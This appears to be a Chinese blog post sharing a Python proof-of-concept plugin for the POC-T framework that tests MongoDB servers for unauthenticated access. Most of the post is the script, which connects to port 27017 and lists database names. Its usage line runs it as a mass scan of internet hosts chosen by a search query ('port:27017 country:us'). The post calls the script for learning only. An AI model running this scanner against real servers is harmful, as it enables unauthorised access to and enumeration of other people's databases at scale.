社区微信群开通啦,扫一扫抢先加入社区官方微信群
社区微信群
有事候知识整合起来会发生很大的威力,尝试着写了一个poc来测试mongodb的未授权访问漏洞,发现危害还是很大的。
把脚本放在https://github.com/Xyntax/POC-T,框架的script目录下面。脚本仅供学习:要安装pymongo
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
moogodb未授权访问
Usage:
python POC-T.py -s mongodb-unauth -aZ "port:27017 country:us"
"""
import socket
import sys
import pymongo
from plugin.util import host2IP
from plugin.util import checkPortTcp
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
try:
if not checkPortTcp(ip,27017):
return False
if testConnect(ip,27017):
return ip
except Exception,e:
return False
return False
def testConnect(ip,port=27017):
global dbname
try:
conn = pymongo.MongoClient(ip,27017,socketTimeoutMS=3000)
dbname = conn.database_names()
#print dbname
if dbname:
return True
except Exception,e:
return False
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!